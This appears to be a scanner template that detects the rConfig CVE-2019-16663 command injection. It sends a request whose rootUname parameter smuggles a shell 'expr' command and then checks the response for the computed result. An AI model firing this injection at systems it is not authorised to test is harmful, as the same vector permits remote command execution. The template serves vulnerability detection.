id: rconfig-cve-2019-16663

info:
    name: rconfig-cve-2019-16663
    author: 17bdw
    severity: high

manual: true
transport: http
set:
    r: randomInt(800000000, 1000000000)
    r1: randomInt(800000000, 1000000000)
rules:
    r0:
        request:
            cache: true
            method: GET
            path: /install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3Bexpr%20{{r}}%20%2B%20{{r1}}%20%20%23
        expression: response.status == 200 && response.body.bcontains(bytes(string(r + r1)))
expression: r0()
